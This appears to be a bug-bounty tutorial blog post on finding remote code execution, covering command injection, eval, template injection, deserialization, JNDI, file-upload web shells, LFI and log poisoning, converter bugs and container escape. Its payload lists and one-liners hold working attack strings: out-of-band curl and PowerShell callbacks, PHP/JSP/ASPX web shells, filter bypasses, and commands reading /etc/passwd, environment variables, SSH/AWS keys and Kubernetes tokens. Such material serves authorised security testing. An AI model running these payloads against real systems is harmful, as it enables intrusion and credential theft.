Yeah, skydiving is cool I guess but… have you ever landed an RCE vulnerability in the wild? The dopamine rush is enough to silence imposter syndrome for a week. If you would like to experience this god complex, keep reading.

I’m going to make this super easy and walk you through a bunch of common RCE pathways. I’ll explain how they work and how to detect them in the wild.

A short disclaimer: While this is an excellent introduction to make you aware of different RCE paths, it won’t give you everything you need to know. Think of it as a teaser—a list of things to note down for further research. You see, every section in this blog could be a book of its own; it’s a deep, dark rabbit hole.

In the wise words of Trinity: “Follow the white rabbit.” 🐇

Command injection in OS exec sinks

Any time the app builds a command string and hands it to a shell helper like system, exec, popen, shell_exec, Runtime.exec via sh -c, subprocess with shell=True, or Node’s child_process.exec, untrusted input can become part of the command line. Shells do far more than run a program. They expand variables, split words, interpret metacharacters, and run subshells. If your input lands in that string, you can often turn a harmless parameter into arbitrary commands.
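To make the shape concrete, here's a minimal Python sketch of the vulnerable pattern. The `lookup` function and its echo command are hypothetical stand-ins for any wrapper that concatenates user input into a shell string:

```python
import subprocess

def lookup(term: str) -> str:
    # VULNERABLE: the parameter is concatenated into the command string,
    # so /bin/sh interprets any metacharacters the user supplies
    cmd = "echo searching for " + term
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

print(lookup("cats"))                  # searching for cats
print(lookup("cats; echo INJECTED"))   # the ; ends echo and runs a second command
```

The fix is just as small: pass an argument list with `shell=False`, so the input stays data instead of becoming part of a command line.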

How to detect it

Have access to the code? Find the sink first, then walk inputs backward.

If you have access to the codebase, grep it for the usual suspects. If the command is built with concatenation, interpolation, or formatting and any piece derives from HTTP params, headers, form fields, JSON, queue messages, or DB rows, mark it hot.

If you’re working on a blackbox engagement, pick any endpoint that accepts filenames, search terms, paths, archive names, or image operations. Nudge the parameter with separators and substitutions and watch for signs of execution.

Some common signals to watch:

  • Immediate output differences when you append ; id, | id, && id, or a newline %0a.
  • Time deltas when you inject ; sleep 5 or & ping -n 6 127.0.0.1 >NUL on Windows.
  • Out of band callbacks to a collaborator when you inject ; curl https://<token>.oast.site/$(id) or ; nslookup whoami.<token>.oast.site.
  • Error echoes that leak the command line, like grep: ; id: No such file or directory.


How to exploit it

Start with low noise, then escalate methodically. Tailor payloads based on context and system type. Here are some options based on the context you find yourself in.

Unquoted concatenation

  • Unix: ; id or | id or && id
  • Windows CMD: & whoami or | whoami or && whoami

Inside double quotes

  • Break out of the double quotes, then inject: ls"; id;#
  • Use a command substitution that still runs in double quotes: "$(id)" to leak output into the response or into a file.

Inside single quotes

  • Break out then continue: ls'; id;#
  • If quotes are filtered but not metacharacters, try a newline %0a id or backticks `id` where applicable.

No whitespace allowed

If you find yourself in a situation where whitespace is not allowed, try these:

  • Use shell field separators: ${IFS}id or $IFS$9id
  • Use brace tricks: {id,-a} for flags, or {cat,/etc/passwd}
  • Tabs %09 often bypass simple space filtering.
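A quick way to convince yourself the ${IFS} trick works, simulated locally with Python driving /bin/sh (the echo command is just a stand-in for whatever the target runs):

```python
import subprocess

# ${IFS} expands to the shell's field separator, so word splitting
# re-creates the space that the filter stripped out
out = subprocess.run("echo${IFS}no-spaces-needed", shell=True,
                     capture_output=True, text=True).stdout
print(out)   # no-spaces-needed
```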

Filters on ; and |

  • Try \n newline, &&, ||, backticks `id`, $(id), or redirections like </dev/null id
  • Use arithmetic or process substitution where supported: $((1+1)), <(id) in bash contexts.

Blind confirmation

Most often, you’ll find yourself in a situation where you can execute commands, but you can’t see the output. In those cases, you’ll need to find a blind way to confirm RCE. Here are some options:

  • Timing: ; sleep 7
  • DNS: ; nslookup $(id).<token>.oast.site
  • HTTP: ; curl -m 3 https://<token>.oast.site/p/$(id)
  • Windows timing: & ping -n 7 127.0.0.1 >NUL
  • Windows OAST: & powershell -c "iwr https://<token>.oast.site/$(whoami)"
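The timing signal is easy to reason about: compare a baseline request against one carrying a sleep, and look for a delta close to the injected duration. A local simulation of that measurement (the echo command stands in for the server's real command):

```python
import subprocess
import time

def timed(shell_cmd: str) -> float:
    # Run the command and measure wall-clock duration
    start = time.monotonic()
    subprocess.run(shell_cmd, shell=True, capture_output=True)
    return time.monotonic() - start

baseline = timed("echo q=cats")          # clean parameter
probe = timed("echo q=cats; sleep 2")    # parameter with "; sleep 2" injected
print(f"baseline={baseline:.2f}s probe={probe:.2f}s")
```

On a real target, repeat with a few different durations (3, 5, 7 seconds) so network jitter can't explain the delta.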

Pivot to real impact once confirmed

Typically, once you’ve confirmed the existence of an RCE vulnerability, you would report it. In rare cases where you need to escalate further (like for a CTF, or with explicit permission from the system owner), you might like to use variations on these impact-proving payloads.

  • File read via shell: ; cat /etc/passwd
  • Process info: ; ps aux | head
  • Environment scrape: ; env
  • Key dump candidates: ; ls -la ~/.ssh, ; ls -la /root/.aws 2>/dev/null
  • Callback with context: ; curl -s https://<token>.oast.site/$(id)_$(hostname)

Windows quirks that help

I tend to have more trouble exploiting Windows systems than Linux, because I’m less familiar with PowerShell/CMD. Here are some tricks that help:

  • CMD separators: &, |, &&, ||
  • PowerShell inline: & powershell -NoP -W Hidden -c "iwr https://<token>.oast.site/$(whoami)"
  • Bypass spaces with environment variables: %SystemRoot%\System32\whoami.exe

Unsafe code evaluation in interpreters

What is it?

Any feature that treats user input as code instead of data. Classic offenders are eval and friends: Python eval or exec, PHP assert and the old preg_replace /e, Ruby eval, JavaScript eval and Function, Node’s vm with a loose context, and Lua load or loadstring. When a developer wires a “formula,” “rule,” or “expression” field into one of these, your string stops being a value and starts becoming instructions that the runtime will happily run.
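The Python flavor of this sink, sketched with a hypothetical "formula" feature:

```python
def compute(formula: str):
    # VULNERABLE: the "formula" string is evaluated as Python code,
    # so it can reach builtins like __import__, not just arithmetic
    return eval(formula)

print(compute("2**8"))                       # 256 — arithmetic evaluates
print(compute("__import__('os').getpid()"))  # arbitrary code runs just as happily
```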

How to detect it

Hunt the sink first, then prove the runtime is actually evaluating. If you’re doing a white box, grep for obvious calls: eval, exec, Function, vm.runInNewContext, assert, create_function, load, loadstring. Trace where their argument comes from. Anything sourced from HTTP params, JSON bodies, headers, DB fields, or queue messages is hot.

If you only have black box access, look for endpoints or features that accept “expressions,” “calculations,” “filters,” “rules,” “templates,” or “advanced search.” Probe with telltale expressions and watch the output or timing:

  • Check for arithmetic that should stay literal if the input is treated as a plain string: 1+1, 2**8, "a"*5
  • Use harmless timing or callback beacons:
    • Python: __import__('time').sleep(5)
    • Node: require('http').get('https://<token>.oast.site/p/'+process.pid)
    • PHP: print(get_current_user());

Errors are useful. Messages like ReferenceError: require is not defined, NameError: __import__, or unexpected token tell you an interpreter tried to parse your input. In this case, you’ll probably be able to achieve RCE with a bit more finesse.

General tricks for tougher filters

If quotes are restricted, try building strings at runtime:

  • JS: String.fromCharCode(47,101,116,99,47,112,97,115,115,119,100)
  • Python: __import__('builtins').__dict__['__im'+'port__']('os').system('id')

If certain tokens are blacklisted, split and join them:

  • JS: global['pro'+'cess'], this['construct'+'or']['construct'+'or'](...)
  • Python: getattr(__import__('os'),'sy'+'stem')('id')

For blind cases, prefer timing and OAST to avoid altering state:

  • Sleep, DNS, or HTTP callbacks that include id or hostname in the path

Quick bug bounty tip: Document the exact request and the confirming output or callback. Once you have a working primitive, you can often reapply the same expression to other endpoints on the same (or a similar) target to quickly find duplicate bugs.

Server side template injection

What is it?

Server side template injection (SSTI) happens when user-controlled input is treated as a template that the server evaluates. Instead of rendering a harmless value into HTML or a string, the engine parses your input as code or expressions. Common engines: Jinja2 and Mako in Python, Twig in PHP, ERB in Ruby, EJS and Pug in Node, and FreeMarker or Thymeleaf in Java. If your payload lands inside the template context or template string itself, you can often read files, reach dangerous objects, and escalate to code execution inside the app process.
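The whole bug class boils down to input landing in the template source instead of the template context. A Jinja2 sketch (assuming the jinja2 package is installed):

```python
from jinja2 import Template

user = "{{ 7*7 }}"  # attacker-supplied value

# SAFE: input passed as data into the render context — stays literal
print(Template("Hello {{ name }}").render(name=user))  # Hello {{ 7*7 }}

# VULNERABLE: input concatenated into the template source itself — evaluated
print(Template("Hello " + user).render())              # Hello 49
```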

How to detect it

Start by confirming that your input is being evaluated, then fingerprint the engine so you know what syntax to use.

Quick eval probes that should never change output if the input is plain text:

  • Jinja2, Twig: {{ 7*7 }} expecting 49
  • Pug: #{7*7} expecting 49
  • FreeMarker, Thymeleaf: ${7*7} expecting 49
  • ERB: <%= 7*7 %> expecting 49
  • EJS: <%= 7*7 %> expecting 49

If you receive an error instead of 49, that is still a positive signal: the engine tried to parse your input. Examine the error text for clues on how you might get it working.

Fingerprint the template engine by using engine-specific quirks:

  • Jinja2: {{ 7*'7' }} gives 7777777
  • Twig: {{ constant('PHP_VERSION') }} may print a version
  • FreeMarker: ${"freemarker.template.Version"?new()} yields a version object
  • ERB: <%= RUBY_VERSION %> yields Ruby version
  • Blind cases: use timing or OAST beacons inside expressions. Some examples:
    • Jinja2 timing: {{ cycler.__init__.__globals__.__builtins__.__import__('time').sleep(5) }}
    • Node EJS OAST: <%= require('http').get('https://<token>.oast.site/'+process.pid) %>
    • PHP Twig OAST if functions are exposed: {{ file_get_contents('https://<token>.oast.site/') }}

Insecure deserialization gadget chains

What is it?

Deserialization bugs happen when the server accepts a byte stream that claims to be an object, trusts it, and rebuilds that object graph in memory. If any class in that graph runs code during magic methods or transformers, your payload executes before business logic even starts. Nice 👌. This is the same shape across ecosystems: Java ObjectInputStream, PHP unserialize, Python pickle, Ruby Marshal, .NET BinaryFormatter, plus “JSON but actually objects” via Java Jackson default typing or YAML loaders. The win comes from a gadget chain already in the classpath or library set, not from uploading new code.
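Python's pickle shows the shape in its purest form: __reduce__ is the magic method that tells the loader which callable to invoke during reconstruction, so the code fires inside pickle.loads itself. The echoed string here is just a harmless proof:

```python
import os
import pickle

class Gadget:
    # __reduce__ describes how to rebuild the object: "call this
    # function with these args" — and the loader obliges at load time
    def __reduce__(self):
        return (os.system, ("echo code ran during unpickling",))

blob = pickle.dumps(Gadget())
status = pickle.loads(blob)   # the echo fires here; status is its exit code
print(status)
```

Real-world Java or PHP chains follow the same idea, only with gadget classes that already live on the classpath instead of a class you define yourself.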

How to detect it

Look for places where opaque blobs round-trip between client and server: remember-me cookies, session stores, shopping carts and search filters are common culprits. In code, sinks are easy to spot. In black box tests, you can fingerprint by tossing tiny canaries and reading the resulting errors.

  • Java often surfaces as Base64 that starts with rO0AB which is AC ED 00 05 in hex, the Java serialization stream header. Errors like java.io.InvalidClassException or stack traces mentioning ObjectInputStream.readObject are a very good sign.
  • PHP serialized values look like O:8:"ClassName":..., or a:1:{...} for arrays. Errors include unserialize(): Error at offset or you see your injected property names reflected.
  • Python pickle frequently appears in Base64 starting with gAS or raw bytes beginning \x80\x04. Errors like pickle.UnpicklingError or AttributeError: Can't get attribute X on <module> confirm that you’re on the right path.
  • Ruby Marshal starts with bytes \x04\x08 (Base64 often BAg...) and errors like ArgumentError: marshal data too short.
  • .NET BinaryFormatter shows System.Runtime.Serialization.Formatters.Binary.ObjectReader in traces. ASP.NET ViewState is a different format but follows the same “object reconstruction” idea if MAC validation is bypassed.

If you don’t have access to the code, the best way to detect deserialization is to flip the target param or cookie to an invalid but well-formed blob for that ecosystem and watch for errors or latency. Examples: send rO0ABXNy to Java endpoints, O:4:"X":0:{} to PHP, gASVAAAAAA== to Python, BAg= to Ruby. If nothing crashes and your value still round-trips cleanly between requests, that’s a sign that it is just plain data, not objects.
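Those canaries aren't magic strings; they're just each format's magic header, Base64-encoded. You can verify two of them locally:

```python
import base64

java_blob = base64.b64decode("rO0ABXNy")        # Java serialization canary
pickle_blob = base64.b64decode("gASVAAAAAA==")  # Python pickle canary

print(java_blob.hex())   # starts with aced0005, the Java stream header
print(pickle_blob[:2])   # b'\x80\x04' — pickle protocol 4
```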

JNDI and remote lookup abuse

What is it?

The Java Naming and Directory Interface (JNDI) lets apps resolve a name like ldap://host/x into an object. If an attacker can influence that name, the target will reach out to your server and try to reconstruct whatever you return. Older JVMs could even load classes from your HTTP server. Newer ones still happily accept “objects” that trigger gadget code during reconstruction. Log4Shell was just one particularly easy way to turn a string inside a logger into a JNDI lookup that ran code.

How to detect it

You are hunting places where attacker-controlled strings can be interpreted by code that performs lookups or interpolates lookups into messages.

If you’ve got access to the code, search for InitialContext.lookup(...), DirContext.search, JndiTemplate.lookup, or anything that builds ldap://, rmi://, iiop://, dns: from user input. Also look for logging frameworks or templating features that support lookups inside strings (helllooooo Log4Shell).

If you don’t have access to the code, spray canaries into fields that are likely to be logged or resolved. Common culprits are headers like X-Api-Version, User-Agent, X-Forwarded-For, JSON keys and values, contact forms, and any “integration URL” fields.

One common callback canary is: ${jndi:ldap://<token>.oast.site/a} but variations include ${jndi:rmi://<token>.oast.site/a} or ${jndi:dns://<token>.oast.site/a} if you’re facing a network with strict egress rules.

A DNS or HTTP hit to your collaborator proves a lookup happened. Server errors that mention JNDI, NamingException, ldap, rmi, or ObjectFactory are signs that it might be possible with some finessing. Delays or timeouts can also be a giveaway.

If nothing fires on the obvious payload, try moving the canary to other fields that you know the app logs. For stubborn cases, use interpolation tricks that survive string filtering, then keep your first goal the same: prove the lookup with a clean OAST callback.

File upload to execution paths

What is it?

What could be more beautiful than uploading a file and watching the server just… execute it?

With this technique, you turn an upload feature into code execution by making the server save something you control in a place the interpreter will run, or by bending the server into treating your file as executable. Classic wins are direct script uploads to webroot, extension confusion that makes a non-script execute as a script, and config sidecars like .htaccess or .user.ini that switch the handler on.

How to detect it

First, map the storage location and the URL path, then push the boundaries of extension and content.

Upload a benign .txt (or whatever extension is allowed) and see if the response reveals a public URL. If not, try predictable paths like /uploads/, /files/, /media/, check the response body, and watch network logs for a redirect to the asset. In many applications you’ll be able to determine the location of the uploaded file by using the application’s features. For example, if you’ve uploaded a new profile picture, get its location by right-clicking the image in your profile and choosing “copy image location”.

Next, we test what extensions are accepted. Try .php, .pHp, .phtml, .phar, .shtml, .jsp, .jspx, .war, .asp, .aspx, .cer, .asa. If blocked, try double extensions shell.php.jpg, or trailing dots and spaces. Normalization is your friend here.
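Double extensions work because many filters inspect only the final suffix. A sketch of that broken check, in Python for illustration:

```python
def blocked(filename: str) -> bool:
    # Naive blocklist: only the trailing extension is inspected
    return filename.lower().endswith((".php", ".phtml", ".phar"))

print(blocked("shell.php"))       # True  — caught
print(blocked("shell.pHp"))       # True  — lower() handles case tricks here
print(blocked("shell.php.jpg"))   # False — double extension sails through
```

Whether the bypassed name actually executes then depends on the server's handler mapping, which is why it's worth trying even when it feels unlikely.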

If the form insists on images, you can attempt content-type and magic-byte tricks:

  • Send Content-Type: image/jpeg with a .php filename.
  • Start the file with a valid JPEG or GIF header, then your payload. Many “image only” validators only peek at the header, so you can fool it by sticking an image header at the top of a PHP file.
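Here's why the header trick works — a sketch of the kind of validator that only peeks at magic bytes (hypothetical, but representative of many "image only" checks):

```python
def looks_like_jpeg(data: bytes) -> bool:
    # Naive "image only" validation: check the first three magic bytes
    return data[:3] == b"\xff\xd8\xff"

# A JPEG header followed by a PHP payload — the validator is satisfied
payload = b"\xff\xd8\xff\xe0JFIF" + b"<?php echo shell_exec('id'); ?>"
print(looks_like_jpeg(payload))   # True
```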

How to exploit it

Start with the simplest route: make the server run a tiny, harmless proof under a server-side interpreter. If that fails, escalate to confusion or config hijack.

Sample uploads

PHP one-liner:

<?php echo shell_exec('id'); ?>

Save as p.php. Upload, then hit /uploads/p.php. For a blind proof, call your collaborator:

<?php file_get_contents('https://<token>.oast.site/'.get_current_user()); ?>

Here’s a JSP one-liner:

<% out.print(new java.util.Scanner(
Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next()); %>

And an ASPX one-liner:

<%@ Page Language="C#" %><%
Response.Write(
new System.IO.StreamReader(
System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo{
FileName="cmd.exe",Arguments="/c whoami",RedirectStandardOutput=true,UseShellExecute=false
}).StandardOutput).ReadToEnd()
);
%>

Polyglots

A polyglot is a file that can be interpreted as valid in two or more formats. There are communities of people out there who build impressive polyglots just as a puzzle. But polyglots aren’t just puzzles, they can be used to bypass file upload filters.

Put a valid header, then PHP:

\xFF\xD8\xFF\xE0JFIF....<?php echo shell_exec('id'); ?>

Use .php as the file extension if you can; the polyglot might pass naive “must be an image” checks.

Uploading config files

Sometimes you can alter the way files are handled (like make them executable) by uploading config files. For example, you might upload a .htaccess file in Apache contexts where AllowOverride permits it, with the following line:

AddType application/x-httpd-php .jpg

Then upload 1.jpg containing <?php echo shell_exec('id'); ?> and navigate to it.

The same goes for .user.ini on PHP-FPM:

auto_prepend_file=/var/www/html/uploads/p.php

Upload that .user.ini, then upload p.php with your harmless command. Any PHP executed in that directory prepends your code. Nice 👌.

Filenames that are actually arguments

Wrappers around system tools sometimes splice the uploaded name into a command. When you control the name, try injecting commands into the filename such as x;id;.png and watch responses for anything abnormal. This is rare but I’ve seen it!

Bypassing extension filters

Try bypassing filters with the usual tricks: case variations like .pHp or .PhP3, a trailing dot (file.php.), or a trailing space (“file.php ”) often work nicely.

LFI, RFI, and log poisoning to code execution

What is it?

Local File Inclusion allows you to force the server to include a file that already exists on the box. Remote File Inclusion lets you make it fetch and include a file from your host. If the target runs a server-side interpreter like PHP, including attacker code means code execution. Even when you can only include local files, you can often poison something the app will read later, like web server logs or PHP session files, then include that poisoned file to run your payload. The usual sink looks like include($_GET['page']), require, render, or any wrapper that turns a path you control into code it executes.

How to detect it

Start by proving that you can influence the include path, then fingerprint the interpreter and filesystem layout.

Sinks are typically parameters named page, template, view, lang, file, include, theme, preview, load. On the attacking side, you can prove LFI with traversal:

If the server is running Linux, try injecting ?page=../../../../etc/passwd and look for root:x:0:0 in the response. If it’s running Windows, try ?page=../../../../Windows/win.ini and look for “for 16-bit app support”.

If the app appends .php or similar, try the classic breakouts. Old stacks sometimes accept a null byte terminator: ?page=../../../../etc/passwd%00. This is such an old trick that it rarely works in the wild anymore, except on very old systems.

Double URL encoding, dot-dot slashes with extra separators, or ....//....// are often required to bypass normalization.
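The ....// trick works because many filters strip ../ once, non-recursively, and the removal itself reassembles a traversal sequence. A sketch of that broken sanitizer:

```python
def naive_sanitize(path: str) -> str:
    # Broken filter: removes "../" in a single non-recursive pass
    return path.replace("../", "")

print(naive_sanitize("../../etc/passwd"))        # etc/passwd — looks fixed
print(naive_sanitize("....//....//etc/passwd"))  # ../../etc/passwd — survives
```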

Try using filter wrappers that return source safely: ?page=php://filter/convert.base64-encode/resource=index.php

With some luck, the app will return base64; decode it to read the PHP source. You’ve just turned your black box into a white box 😏.
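Decoding the response is a one-liner. Here the leaked string is a made-up example standing in for whatever the filter wrapper actually returns:

```python
import base64

leaked = "PD9waHAgZWNobyAnaGknOyA/Pg=="   # hypothetical response body
print(base64.b64decode(leaked).decode())   # <?php echo 'hi'; ?>
```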

If URLs are accepted, check for RFI! Inject payloads like ?page=http://<yourhost>/p.txt and watch your server logs for a fetch. If execution happens, you will see the effects of your payloads.

Poisoning log files

The most common locations for log files and other poisonable targets are:

  • Apache: /var/log/apache2/access.log, /var/log/httpd/access_log
  • Nginx: /var/log/nginx/access.log
  • PHP sessions: /var/lib/php/sessions/sess_<PHPSESSID> or distro variant
  • Proc env if FPM passes it through: /proc/self/environ

If you find LFI, you can sometimes make HTTP requests that carry the code you want to run (for example, PHP in the User-Agent header) so that it lands in the log file, then use the LFI to include and execute that log.

Parser exploits in image and document converters

What is it?

When an app processes uploads, it often hands your file to heavy parsers or helper tools like ImageMagick, GraphicsMagick, libvips, Ghostscript, ExifTool, ffmpeg, or LibreOffice headless. Many of these helper tools treat files as little programming languages (MVG, SVG, PostScript, PDF, DjVu) or invoke external delegates under the hood. If you can smuggle a scriptable format past extension checks, or if a delegate builds a shell command using your filename, your upload can execute code in the converter process.

How to detect it

First we need to confirm that there is a conversion step. Some specific methods:

  • Upload a valid image, request it back, and note if the server resizes, re-encodes, strips metadata, or generates thumbnails. Those are conversion hints.
  • Send mismatched extensions vs content to see if the backend sniffs real format. For example, a file named .jpg that actually begins with %PDF or PostScript %!PS.
  • Use formats with network-capable primitives to get an OAST callback. For example SVGs that reference a remote resource:
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
   <image href="https://<token>.oast.site/probe.svg" width="1" height="1"/>
</svg>

Or an ImageMagick MVG disguised as JPG that pulls a URL when rasterized:

push graphic-context
viewbox 0 0 1 1
fill 'url(https://<token>.oast.site/mvg)'
pop graphic-context
  • Look for error pages or logs that leak converter versions, delegate paths, or commands like gs -q -dSAFER ... or ffmpeg -i.

How to exploit it

There are so many different ways this can be exploited that this one section could be a whole book, so for now I’ll just give you some terms for further research:

  • ImageMagick for image uploads
  • Ghostscript through PDF, PS or EPS
  • RCE through exif and metadata (rare!)
  • OpenOffice document conversion (under the hood, these are just a bunch of XML files in a ZIP, often vulnerable to XXE, SSRF, and even RCE)

Container RCE to host escape

What is it?

You start with code execution inside a container, then pivot to control the host or cluster. The usual bridges are mis-mounted sockets, overpowered capabilities, sloppy hostPath mounts, or in-cluster credentials that let you schedule a privileged pod. Your goal is to find a control surface that lives outside the container boundary and drive it. Let’s gooo! 👇

How to detect it

First, confirm you are containerized, then run a series of tests to see if there are any holes you can ride back to the host.

This command will test if you’re in a container: test -f /.dockerenv || grep -E 'docker|kubepods' /proc/1/cgroup

This will test if there are any Docker or CRI sockets around:
ls -l /var/run/docker.sock /run/containerd/containerd.sock /var/run/crio/crio.sock

This will check whether any Kubernetes service account creds are lying around. Cross your fingers before running it: ls /var/run/secrets/kubernetes.io/serviceaccount/ then cat .../token

Check to see if the host filesystem is mounted anywhere: ls -ld /host /rootfs /node /var/lib/docker /var/run and mount | grep -E '/host|/rootfs'
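If you land a Python-capable shell, the first check above folds into a quick triage function — a sketch:

```python
import os
import re

def in_container() -> bool:
    # Heuristic 1: Docker's sentinel file
    if os.path.exists("/.dockerenv"):
        return True
    # Heuristic 2: container runtimes show up in PID 1's cgroup paths
    try:
        cgroup = open("/proc/1/cgroup").read()
    except OSError:
        return False
    return bool(re.search(r"docker|kubepods|containerd", cgroup))

print(in_container())
```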

Any one of these positives is usually enough for a clean escape. Good luck!

Conclusion

I have a theory that RCE is more common than most hackers realize. Build a good flow and you develop a sixth sense for places to try these injections. Once you see how a plain string becomes a process, you start spotting the same shape everywhere: strings stitched into shells, expressions that are evaluated, templates that execute, objects that wake up and run code, files that the server treats like programs, lookups that resolve to your infrastructure, converters that are really interpreters, containers that have a bridge back to the host. The specific payloads change; the path does not.

If you take anything from this guide, make it the workflow:

  • Prove execution with the smallest possible signal, ideally out of band. Capture the exact request and the confirming evidence.
  • When you land one primitive, sweep the app for twins that share the same sink.
  • When you drop into a container, look for the rails that lead out.

You are not guessing, you are following the data until the runtime has no choice but to run it.

Use this on Bugcrowd targets with care. Keep proofs harmless and reversible, stick to id or a short callback, and write reports that show the chain clearly from input to impact. Do that consistently and you will land more real RCEs, ship cleaner evidence, and spend less time arguing severity and more time collecting the dopamine.

Happy hacking!